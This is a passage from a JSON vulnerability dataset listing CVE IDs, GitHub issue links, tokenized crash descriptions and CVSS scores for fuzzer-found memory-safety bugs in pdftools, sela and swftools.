  70104. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70105. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70106. "severity": "MEDIUM",
  70107. "baseScore": 5.5,
  70108. "impactScore": 3.6,
  70109. "exploitabilityScore": 1.8
  70110. },
  70111. {
  70112. "CVE_ID": "CVE-2021-39540",
  70113. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/2",
  70114. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/2",
  70115. "Repo_new": "leonhad/pdftools",
  70116. "Issue_Created_At": "2020-08-06T03:21:53Z",
  70117. "description": "A stack overflow in APITAG causes Segmentation fault. System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70118. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70119. "severity": "HIGH",
  70120. "baseScore": 7.8,
  70121. "impactScore": 5.9,
  70122. "exploitabilityScore": 1.8
  70123. },
  70124. {
  70125. "CVE_ID": "CVE-2021-39541",
  70126. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/3",
  70127. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/3",
  70128. "Repo_new": "leonhad/pdftools",
  70129. "Issue_Created_At": "2020-08-06T03:28:10Z",
  70130. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70131. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70132. "severity": "MEDIUM",
  70133. "baseScore": 5.5,
  70134. "impactScore": 3.6,
  70135. "exploitabilityScore": 1.8
  70136. },
  70137. {
  70138. "CVE_ID": "CVE-2021-39542",
  70139. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/5",
  70140. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/5",
  70141. "Repo_new": "leonhad/pdftools",
  70142. "Issue_Created_At": "2020-08-06T03:35:01Z",
  70143. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70144. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70145. "severity": "MEDIUM",
  70146. "baseScore": 5.5,
  70147. "impactScore": 3.6,
  70148. "exploitabilityScore": 1.8
  70149. },
  70150. {
  70151. "CVE_ID": "CVE-2021-39543",
  70152. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/1",
  70153. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/1",
  70154. "Repo_new": "leonhad/pdftools",
  70155. "Issue_Created_At": "2020-08-05T14:10:06Z",
  70156. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70157. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70158. "severity": "MEDIUM",
  70159. "baseScore": 5.5,
  70160. "impactScore": 3.6,
  70161. "exploitabilityScore": 1.8
  70162. },
  70163. {
  70164. "CVE_ID": "CVE-2021-39544",
  70165. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/25",
  70166. "Issue_Url_new": "https://github.com/saharatul/sela/issues/25",
  70167. "Repo_new": "saharatul/sela",
  70168. "Issue_Created_At": "2020-08-14T04:52:18Z",
  70169. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70170. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70171. "severity": "HIGH",
  70172. "baseScore": 7.8,
  70173. "impactScore": 5.9,
  70174. "exploitabilityScore": 1.8
  70175. },
  70176. {
  70177. "CVE_ID": "CVE-2021-39545",
  70178. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/31",
  70179. "Issue_Url_new": "https://github.com/saharatul/sela/issues/31",
  70180. "Repo_new": "saharatul/sela",
  70181. "Issue_Created_At": "2020-08-14T05:04:52Z",
  70182. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70183. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70184. "severity": "MEDIUM",
  70185. "baseScore": 5.5,
  70186. "impactScore": 3.6,
  70187. "exploitabilityScore": 1.8
  70188. },
  70189. {
  70190. "CVE_ID": "CVE-2021-39546",
  70191. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/29",
  70192. "Issue_Url_new": "https://github.com/saharatul/sela/issues/29",
  70193. "Repo_new": "saharatul/sela",
  70194. "Issue_Created_At": "2020-08-14T05:00:32Z",
  70195. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70196. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70197. "severity": "HIGH",
  70198. "baseScore": 7.8,
  70199. "impactScore": 5.9,
  70200. "exploitabilityScore": 1.8
  70201. },
  70202. {
  70203. "CVE_ID": "CVE-2021-39547",
  70204. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/32",
  70205. "Issue_Url_new": "https://github.com/saharatul/sela/issues/32",
  70206. "Repo_new": "saharatul/sela",
  70207. "Issue_Created_At": "2020-08-14T05:06:36Z",
  70208. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70209. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70210. "severity": "MEDIUM",
  70211. "baseScore": 5.5,
  70212. "impactScore": 3.6,
  70213. "exploitabilityScore": 1.8
  70214. },
  70215. {
  70216. "CVE_ID": "CVE-2021-39548",
  70217. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/28",
  70218. "Issue_Url_new": "https://github.com/saharatul/sela/issues/28",
  70219. "Repo_new": "saharatul/sela",
  70220. "Issue_Created_At": "2020-08-14T04:58:45Z",
  70221. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70222. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70223. "severity": "MEDIUM",
  70224. "baseScore": 5.5,
  70225. "impactScore": 3.6,
  70226. "exploitabilityScore": 1.8
  70227. },
  70228. {
  70229. "CVE_ID": "CVE-2021-39549",
  70230. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/27",
  70231. "Issue_Url_new": "https://github.com/saharatul/sela/issues/27",
  70232. "Repo_new": "saharatul/sela",
  70233. "Issue_Created_At": "2020-08-14T04:56:57Z",
  70234. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70235. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70236. "severity": "MEDIUM",
  70237. "baseScore": 5.5,
  70238. "impactScore": 3.6,
  70239. "exploitabilityScore": 1.8
  70240. },
  70241. {
  70242. "CVE_ID": "CVE-2021-39550",
  70243. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/30",
  70244. "Issue_Url_new": "https://github.com/saharatul/sela/issues/30",
  70245. "Repo_new": "saharatul/sela",
  70246. "Issue_Created_At": "2020-08-14T05:02:24Z",
  70247. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70248. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70249. "severity": "HIGH",
  70250. "baseScore": 7.8,
  70251. "impactScore": 5.9,
  70252. "exploitabilityScore": 1.8
  70253. },
  70254. {
  70255. "CVE_ID": "CVE-2021-39551",
  70256. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/26",
  70257. "Issue_Url_new": "https://github.com/saharatul/sela/issues/26",
  70258. "Repo_new": "saharatul/sela",
  70259. "Issue_Created_At": "2020-08-14T04:54:33Z",
  70260. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70261. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70262. "severity": "HIGH",
  70263. "baseScore": 7.8,
  70264. "impactScore": 5.9,
  70265. "exploitabilityScore": 1.8
  70266. },
  70267. {
  70268. "CVE_ID": "CVE-2021-39552",
  70269. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/23",
  70270. "Issue_Url_new": "https://github.com/saharatul/sela/issues/23",
  70271. "Repo_new": "saharatul/sela",
  70272. "Issue_Created_At": "2020-08-14T02:49:47Z",
  70273. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70274. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70275. "severity": "HIGH",
  70276. "baseScore": 7.8,
  70277. "impactScore": 5.9,
  70278. "exploitabilityScore": 1.8
  70279. },
  70280. {
  70281. "CVE_ID": "CVE-2021-39553",
  70282. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/103",
  70283. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/103",
  70284. "Repo_new": "matthiaskramm/swftools",
  70285. "Issue_Created_At": "2020-08-01T06:55:27Z",
  70286. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow grealloc gmem NUMBERTAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  70287. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70288. "severity": "MEDIUM",
  70289. "baseScore": 5.5,
  70290. "impactScore": 3.6,
  70291. "exploitabilityScore": 1.8
  70292. },
  70293. {
  70294. "CVE_ID": "CVE-2021-39554",
  70295. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/100",
  70296. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/100",
  70297. "Repo_new": "matthiaskramm/swftools",
  70298. "Issue_Created_At": "2020-08-01T02:16:31Z",
  70299. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow Lexer Lexer NUMBERTAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70300. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70301. "severity": "MEDIUM",
  70302. "baseScore": 5.5,
  70303. "impactScore": 3.6,
  70304. "exploitabilityScore": 1.8
  70305. },
  70306. {
  70307. "CVE_ID": "CVE-2021-39555",
  70308. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/99",
  70309. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/99",
  70310. "Repo_new": "matthiaskramm/swftools",
  70311. "Issue_Created_At": "2020-08-01T02:10:19Z",
  70312. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./SEGV type3D0 APITAG NUMBERTAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70313. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70314. "severity": "MEDIUM",
  70315. "baseScore": 5.5,
  70316. "impactScore": 3.6,
  70317. "exploitabilityScore": 1.8
  70318. },
  70319. {
  70320. "CVE_ID": "CVE-2021-39556",
  70321. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/105",
  70322. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/105",
  70323. "Repo_new": "matthiaskramm/swftools",
  70324. "Issue_Created_At": "2020-08-01T07:01:24Z",
  70325. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./SEGV type3D1 APITAG NUMBERTAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70326. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70327. "severity": "MEDIUM",
  70328. "baseScore": 5.5,
  70329. "impactScore": 3.6,
  70330. "exploitabilityScore": 1.8
  70331. },
  70332. {
  70333. "CVE_ID": "CVE-2021-39558",
  70334. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/106",
  70335. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/106",
  70336. "Repo_new": "matthiaskramm/swftools",
  70337. "Issue_Created_At": "2020-08-02T03:17:40Z",
  70338. "description": "A stack buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow APITAG APITAG NUMBERTAG APITAG output ERRORTAG POC FILETAG",
  70339. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70340. "severity": "HIGH",
  70341. "baseScore": 7.8,
  70342. "impactScore": 5.9,
  70343. "exploitabilityScore": 1.8
  70344. },
  70345. {
  70346. "CVE_ID": "CVE-2021-39559",
  70347. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/101",
  70348. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/101",
  70349. "Repo_new": "matthiaskramm/swftools",
  70350. "Issue_Created_At": "2020-08-01T02:18:46Z",
  70351. "description": "A SEGV in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./SEGV APITAG APITAG NUMBERTAG APITAG output ERRORTAG POC FILETAG",
  70352. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70353. "severity": "MEDIUM",
  70354. "baseScore": 5.5,
  70355. "impactScore": 3.6,
  70356. "exploitabilityScore": 1.8
  70357. },
  70358. {
  70359. "CVE_ID": "CVE-2021-39561",
  70360. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/102",
  70361. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/102",
  70362. "Repo_new": "matthiaskramm/swftools",
  70363. "Issue_Created_At": "2020-08-01T02:31:55Z",
  70364. "description": "A stack overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null APITAG output ERRORTAG POC FILETAG",
  70365. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70366. "severity": "HIGH",
  70367. "baseScore": 7.8,
  70368. "impactScore": 5.9,
  70369. "exploitabilityScore": 1.8
  70370. },
  70371. {
  70372. "CVE_ID": "CVE-2021-39562",
  70373. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/98",
  70374. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/98",
  70375. "Repo_new": "matthiaskramm/swftools",
  70376. "Issue_Created_At": "2020-08-01T02:04:36Z",
  70377. "description": "A stack overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow Stream NUMBERTAG APITAG output ERRORTAG POC FILETAG",
  70378. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70379. "severity": "MEDIUM",
  70380. "baseScore": 5.5,
  70381. "impactScore": 3.6,
  70382. "exploitabilityScore": 1.8
  70383. },
  70384. {
  70385. "CVE_ID": "CVE-2021-39563",
  70386. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/115",
  70387. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/115",
  70388. "Repo_new": "matthiaskramm/swftools",
  70389. "Issue_Created_At": "2020-08-05T07:02:23Z",
  70390. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70391. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70392. "severity": "MEDIUM",
  70393. "baseScore": 5.5,
  70394. "impactScore": 3.6,
  70395. "exploitabilityScore": 1.8
  70396. },
  70397. {
  70398. "CVE_ID": "CVE-2021-39564",
  70399. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/116",
  70400. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/116",
  70401. "Repo_new": "matthiaskramm/swftools",
  70402. "Issue_Created_At": "2020-08-05T07:06:56Z",
  70403. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70404. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70405. "severity": "HIGH",
  70406. "baseScore": 7.8,
  70407. "impactScore": 5.9,
  70408. "exploitabilityScore": 1.8
  70409. },
  70410. {
  70411. "CVE_ID": "CVE-2021-39569",
  70412. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/114",
  70413. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/114",
  70414. "Repo_new": "matthiaskramm/swftools",
  70415. "Issue_Created_At": "2020-08-05T06:59:30Z",
  70416. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70417. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70418. "severity": "HIGH",
  70419. "baseScore": 7.8,
  70420. "impactScore": 5.9,
  70421. "exploitabilityScore": 1.8
  70422. },
  70423. {
  70424. "CVE_ID": "CVE-2021-39574",
  70425. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/124",
  70426. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/124",
  70427. "Repo_new": "matthiaskramm/swftools",
  70428. "Issue_Created_At": "2020-08-05T07:40:08Z",
  70429. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output CODETAG POC FILETAG",
  70430. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70431. "severity": "HIGH",
  70432. "baseScore": 7.8,
  70433. "impactScore": 5.9,
  70434. "exploitabilityScore": 1.8
  70435. },
  70436. {
  70437. "CVE_ID": "CVE-2021-39575",
  70438. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/128",
  70439. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/128",
  70440. "Repo_new": "matthiaskramm/swftools",
  70441. "Issue_Created_At": "2020-08-06T05:20:06Z",
  70442. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70443. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70444. "severity": "MEDIUM",
  70445. "baseScore": 5.5,
  70446. "impactScore": 3.6,
  70447. "exploitabilityScore": 1.8
  70448. },
  70449. {
  70450. "CVE_ID": "CVE-2021-39577",
  70451. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/121",
  70452. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/121",
  70453. "Repo_new": "matthiaskramm/swftools",
  70454. "Issue_Created_At": "2020-08-05T07:26:44Z",
  70455. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70456. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70457. "severity": "HIGH",
  70458. "baseScore": 7.8,
  70459. "impactScore": 5.9,
  70460. "exploitabilityScore": 1.8
  70461. },
  70462. {
  70463. "CVE_ID": "CVE-2021-39579",
  70464. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/125",
  70465. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/125",
  70466. "Repo_new": "matthiaskramm/swftools",
  70467. "Issue_Created_At": "2020-08-05T07:42:59Z",
  70468. "description": "A heap buffer overflow in q.c NUMBERTAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70469. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70470. "severity": "HIGH",
  70471. "baseScore": 7.8,
  70472. "impactScore": 5.9,
  70473. "exploitabilityScore": 1.8
  70474. },
  70475. {
  70476. "CVE_ID": "CVE-2021-39582",
  70477. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/122",
  70478. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/122",
  70479. "Repo_new": "matthiaskramm/swftools",
  70480. "Issue_Created_At": "2020-08-05T07:32:22Z",
  70481. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70482. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70483. "severity": "HIGH",
  70484. "baseScore": 7.8,
  70485. "impactScore": 5.9,
  70486. "exploitabilityScore": 1.8
  70487. },
  70488. {
  70489. "CVE_ID": "CVE-2021-39583",
  70490. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/136",
  70491. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/136",
  70492. "Repo_new": "matthiaskramm/swftools",
  70493. "Issue_Created_At": "2020-08-06T05:41:56Z",
  70494. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70495. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70496. "severity": "MEDIUM",
  70497. "baseScore": 5.5,
  70498. "impactScore": 3.6,
  70499. "exploitabilityScore": 1.8
  70500. },
  70501. {
  70502. "CVE_ID": "CVE-2021-39584",
  70503. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/130",
  70504. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/130",
  70505. "Repo_new": "matthiaskramm/swftools",
  70506. "Issue_Created_At": "2020-08-06T05:23:46Z",
  70507. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70508. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70509. "severity": "MEDIUM",
  70510. "baseScore": 5.5,
  70511. "impactScore": 3.6,
  70512. "exploitabilityScore": 1.8
  70513. },
  70514. {
  70515. "CVE_ID": "CVE-2021-39585",
  70516. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/133",
  70517. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/133",
  70518. "Repo_new": "matthiaskramm/swftools",
  70519. "Issue_Created_At": "2020-08-06T05:33:14Z",
  70520. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70521. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70522. "severity": "MEDIUM",
  70523. "baseScore": 5.5,
  70524. "impactScore": 3.6,
  70525. "exploitabilityScore": 1.8
  70526. },
  70527. {
  70528. "CVE_ID": "CVE-2021-39587",
  70529. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/129",
  70530. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/129",
  70531. "Repo_new": "matthiaskramm/swftools",
  70532. "Issue_Created_At": "2020-08-06T05:22:26Z",
